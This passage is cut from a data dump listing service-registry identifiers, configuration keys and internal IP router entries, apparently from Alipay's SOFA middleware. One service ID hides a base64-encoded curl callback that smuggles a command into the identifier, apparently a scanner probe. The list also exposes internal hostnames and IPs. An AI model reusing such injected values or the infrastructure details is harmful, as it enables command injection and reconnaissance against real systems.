A","com.ipay.ilimitcenter.service.facade.manage.api.LimitPeriodDataManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.InvestmentContractDrm.modifyContract,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ecdcc:name=com.alipay.eccommon.monitor.drm.resource.LoggerSwitchControlResource.serviceInOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.PermLogConfig.logFieldJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqualitywalleetoe.common.service.facade.api.MyFocusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:abnclprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcalm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.spi.callback.PayAuthManageCallBackService:1.0:yebstarwish@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.EventChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.useConcurrentTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.scene.FinSceneRuleCenterDrmImpl.starWishSceneActiveConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricemng.common.service.facade.api.adjust.PricemngAdjustManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.appeal.TransportAppealQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MRCHISWISDOM#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finslipTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instpay.settleprod.service.facade.SettleprodActivityStateResolver:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frastress.common.service.facade.api.category.BizCategorySaveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PermissionActionFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.DrillCalendarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_PCREDIT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_PCIEP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_INSTBILL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.prod.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.CZFlowSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.testRunJdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.policybench.common.service.facade.api.TaskNodeAndSlotsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:O2N1cmwgaHR0cDovLzMzMDI0ODY5LS0xMDQwMDMwMjMuYW50c2Nhbm5lci5nbG9iYWwuYWxpcGF5LmNvbTs=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.quotetradecore.common.service.facade.api.LinkeQualityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.ControltowerEventService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.netflowcore.spi.AggregatorConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.service.ServiceConfigureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_Q_DOOM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcenter.common.service.facade.csplatform.CommonQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.comm.service.facade.callback.SchedulerCallbackService:1.0:finsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.cide.common.service.facade.api.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.RecoverAccidentalItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinschedulerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accagovernance.core.service.AutoTestPlatformService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.facade.CategoryRecProviderService:1.0:imasp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_SECURITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-testkoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.BizDisplayBlockAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.dynamicOtpCodeParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pushcore.facade.PushMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.monitorHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.certdoc.common.facade.UserCertDocQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zskynet.zdalExplorerDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:yuemamng#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoscene.common.service.facade.api.united.FinsUnitedOptContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityNgoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.IClusterMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientRateMngQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:securitymegadata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.paycheckersdk.service.ReversePayCheckerService:1.0:inscheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:appstore#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:pullBlockSplitor_logistics_mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.depositBackInstStart,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbmaterialcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:linepay@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.biz.shared.decision.drm.RecordBlackListResource.refreshCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydds.biz.open.api.facade.CommonQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.common.service.facade.agreement.KatongPaymentApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:sitecenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_PVSOFACLIENT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_EXCHANGE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.account.HealthAccountGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.TaskInvitedRecodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.103.76.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.cloud.osp.user.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inshealthprod.facade.HealthPolicyAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.AssistantRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.dasdbDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.ssu.SsuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.comment.ServiceConfManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bizfund.common.service.facade.fundcontrol.api.FundControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.96.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.20.188.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitradeprod.plugin.appfuse.facade.service.UnitradeprodAppfuseFacade:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.115.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:instfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_SEC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprod.biz.trade.purchase.service.FundPurchaseApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.userinsight.api.UserVisitLineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.login.BioProductManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GMPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChargeOperationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.BatchAppRelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.api.MFundUnfreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.pageSizeThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.236.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.grscore.common.service.facade.api.competenceCenter.ImportWorkLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.RuleCheckCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.detecttask.DetectTaskOrderComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.prodsale.ProdSaleMarkCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.mng.AdaMngTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepSCAssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCJieBeiMediumCashFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.checkFinstrategyGenerateUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.findecision.biz.monitor.custom.drm.KeyBizIndexResource.zscaleKeyIndex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inspectprod.common.service.trigger.inspect.InspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.credit.JieBeiFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspricecore.common.service.facade.InsPriceCorePensionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FinancingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.content.service.facade.HoloxDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.IppProductProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.115.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:sesameCredit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.portal.RptCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.AppBizLogicRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:mcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.staticrescore.common.service.facade.ResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RatePortalSearchTriple:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.service.DiscountReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.assetloan.facade.AssetRepayInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:commonActivityRecordBizController@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ModelInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.announce.LifeAnnouncementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.pricing.TradePriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsLeadsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.190.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.gmcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:unitradeprod_gzone_gzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.moee.common.service.facade.service.dataset.DataSetTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.biz.risk.manager.RiskImpactAssessmentManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.moee.common.service.facade.service.tasks.TaskInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.blackFundCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.26.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhcprod.common.service.facade.CommonFuseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.api.FluxSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:vendorcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.facade.alarm.AcceptAlarmMessageFacade:1.0:acceptAlarmMessageFacadeStable@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_send_myBank_audit_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.prepaidcard.CardFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finbatch_ob_datasource_logic_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iliquidity.biz.manager.reportmanage.ReportDataComponentManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.163.97.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alifi.autofinanceprod.service.facade.openservice.VerifyIdQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.pop.PopQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTransOutQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.116.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@aclinkelib#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.instpay.facade.api.InstRefundConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.PatchValidateDrmResourceTrigger.supportChannelTypesStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.MrchisCrmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.acl.api.service.UsergroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.camp.service.AutoMktCampFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.digitContent.RelationCNN:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.alipay.fwd.CommonFwdService:1.0:iothub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icsmng.service.facade.cicada.limit.LimitCumulativeInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_activitySampleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PRODTRANSQUERY#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.148.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbopenprod.common.service.facade.commodity.CommodityHiddenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yuemaprod.common.facade.service.YuemaRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ngfesync.facade.daas.meta.DbMetaService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.130.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppgw.facade.EdeductOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.bizCodeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointprod.commom.manage.facade.contract.api.AppScenarioPermissionCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.topic.TopicQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_FINANCE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:securityexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.CreditAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.task.TaskExecuteCBFacade:1.0:mwealthprod_tuition_account@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_SCHEDULER_SERVERLESS_PLAN_TIMEOUT_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.campaignv2.CampAwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.ots.OTSFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_investment_sys_retry.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.orderdatacenter.biz.service.impl.route.InnerRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.159.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvoice.common.service.facade.api.EinvOpenEntranceShowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.facade.iopenmonitor.solution.SolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.queryMasterSlavePS,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.236.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@tsm#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.73.27.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.166.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbshopdetail.facade.ItemCartFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finagendacore.common.service.facade.msg.MsgDeliveryFacade:1.0@DEFAULT#@#DEFAULT_I